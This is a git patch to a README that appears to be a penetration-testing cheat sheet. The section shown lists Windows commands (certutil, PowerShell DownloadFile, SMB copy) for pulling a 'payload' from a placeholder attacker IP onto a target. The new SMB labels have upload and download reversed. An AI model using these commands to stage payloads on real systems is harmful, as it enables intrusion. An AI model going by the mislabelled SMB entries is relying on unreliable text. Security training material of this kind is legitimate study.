From 7f34f1665890921630d524eebcb397579b5134d5 Mon Sep 17 00:00:00 2001 From: Joe Totes <59018247+Totes5706@users.noreply.github.com> Date: Wed, 7 Sep 2022 11:01:12 -0400 Subject: [PATCH] Update README.md --- README.md | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index c4633bf..3b68146 100644 --- a/README.md +++ b/README.md @@ -1396,8 +1396,12 @@ certutil -split -f -urlcache http://{IP ADDRESS}/{FILE} # Windows - Download file using powershell powershell -c "(new-object System.Net.WebClient).DownloadFile('http://{IP ADDRESS}/{FILE.exe}','C:\Users\{USER}\{FILE.exe}')" -# SMB SHARE -\\{IP ADDRESS}\share\{FILE} +# SMB SHARE UPLOAD FILE +copy \\{IP ADDRESS}\share\{FILE} + +# SMB SHARE DOWNLAOD FILE +net use z: \\{IP ADDRESS}\share\ +copy {FILE} z: # {IP ADDRESS}: IP Address of the client from step one # {FILE}: The payload to be transferred